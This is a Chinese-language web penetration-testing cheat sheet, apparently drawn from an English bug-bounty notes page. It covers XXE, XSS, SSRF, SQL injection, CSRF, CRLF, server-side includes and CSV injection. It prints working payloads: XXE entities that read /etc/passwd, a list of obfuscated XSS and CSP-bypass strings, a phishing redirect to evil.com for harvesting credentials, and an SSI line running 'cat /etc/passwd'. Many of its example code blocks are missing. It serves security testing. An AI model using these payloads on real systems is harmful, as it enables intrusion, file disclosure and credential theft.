Web-Fast-Fuzz
XXE
测试方法
发现post请求的接口的时候,可以这样试试:
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<methodCall><methodName>&test;</methodName></methodCall>如果发现了一个错误:
<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test "nice string bro">]
>
<methodCall><methodName>&test;</methodName></methodCall>说明能够解析,试试读文件:
<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "file:///etc/passwd">]
>
<methodCall><methodName>&test;</methodName></methodCall>或者用php伪协议:
得到的结果再base64解码即可。
webgoat8
测试方法
试一试是否可以添加实体的评论:
可以的话,试试file:
MUTILLIDAE
要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:
或者把xml版本忽略掉:
以及上面提到的php流:
OUT OF BAND
基础测试
使用 burp 的collaborator 然后单击
copy the payload to clipboard将下面的code放入xml文件,然后上传:
看看是否发送了请求
成功后,再利用其他payload
读文件
wing.xml
vps->evil.dtd
host in dtd:
使用FTP读文件
evil.xml
将dtd文件放在VPS上:
ruby利用脚本:
fuzz
XSS
对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:
文件上传的XSS
发现上传点的时候,可以试试用payload作为文件名:
or:
or:
SVG
stuff.svg
XML
CSP BYPASS
常用的payload
svg/onload'-alert(1)-'eval(atob('YWxlcnQoMSk='))<iMg SrC=x OnErRoR=alert(1)><div onmouseover="alert('XSS');"></Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>x@x.com<--`<img/src=` onerror=alert(1)> --!>""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
AUTH CRED
遇到http-only的时候: 使用钓鱼的基本身份验证获取其凭据
1. 注册一个和目标类似的域名
2. https://github.com/ryhanson/phishery
3. 编译然后运行
4. 设置payload----<img/src/onerror=document.location="https://evil.com/">
5. 等待目标上线
可还行

偷Cookie
Blacklist bypass: 过滤了//,:,",<和>
payload:
另外一个:
比较不错的一个payload:
nc 监听:
测试session劫持
利用burp重放功能进行测试。 看不同cookie会有什么变化。
FILTER BYPASS RESOURCES
收集到的payload:
基于POST的XSS
如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。
DOM XSS
beef的hook,urlencode
这些站点有大量的xss payload
payload生成:
SSRF
在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。 Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。
PS:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
想办法探测内网资产:http://internal-server:22/notarealfile.txt 更换端口,查看回显,判断端口的开放。 没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。 根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。
如果你的payload中有路径,最好带上&,#
这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/
Bug Bounty Write-ups:
SQL注入
使用SQLMap在PUT REST Params中测试SQLi:
备忘录:https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
可以试试双编码输入。
会话固定
快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:
CSRF
一些绕过技术,即使有CSRF Token: https://zseano.com/tutorials/5.html
csrf和reset api:
案例:
CSRF TO REDECT XSS
文件上传漏洞
在OS X上创建测试10g文件(对于测试文件上载限制很有用):
无限制的文件上传
资源:
一些备忘录:https://github.com/jhaddix/tbhm
CORS配置错误
用于测试的POC:
资源:
测试心脏出血漏洞
偷私钥
https://gist.github.com/bonsaiviking/10402038 https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
重定向
http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html
重定向到beef:
使用Burp中的Decoder将其编码为base-64,并将其传递给payload:
other:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open redirect
CRLF注入
当你看到请求的参数是这样:
回显是这样:
尝试CRLF注射:
模板注入
您可以将一些代码放入jsfiddle以进行payload测试:
http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
RCE
使用WEBSHELL上传(.NET)绕过AV: 这是一个示例,其中包含fuzzdb项目中的一个webshell:
https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/
PHP中的匿名函数RCE
PHP实验
如果您需要测试一些PHP代码,可以使用本机Web服务器来托管它:
PHP交互式SHELL
CSV注入
在Windows上的Excel中,输入以下内容以获取cmd shell:
exmaple:https://rhinosecuritylabs.com/azure/cloud-security-risks-part-1-azure-csv-injection-vulnerability/
movie:https://www.youtube.com/watch?v=SC7AkclnG2g
有用的脚本
不断检查网站服务是否关闭:
IDORS
服务器端包含注入
把它放在一个易受攻击的参数中: 如果有效,您应该在响应中看到当前日期和时间输出。
<!--#printenv -->:输出环境变量。
<!--#exec cmd="cat /etc/passwd"-->
more:
点击劫持
只需使用Burp的clickbandit。还要记住:Clickjacking适用于点击,而不适用于键盘。
poc:
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009) https://javascript.info/clickjacking https://www.tinfoilsecurity.com/blog/what-is-clickjacking
攻击JSON
利用burp标记参数进行主动扫描
反序列化漏洞
Writeup on Oracle Weblogic CVE-2018-2628 Java Deserialization Scanner Burp Extension Java Serialized Payloads Burp Extension
工具
测试不安全的JWT
LFI
https://hack-ed.net/2017/11/05/finally-a-bug-bounty-write-up-lfi/
子域名探测技术
https://0xpatrik.com/subdomain-takeover-starbucks/
原文地址:https://techvomit.net/web-application-penetration-testing-notes/
最后更新于
这有帮助吗?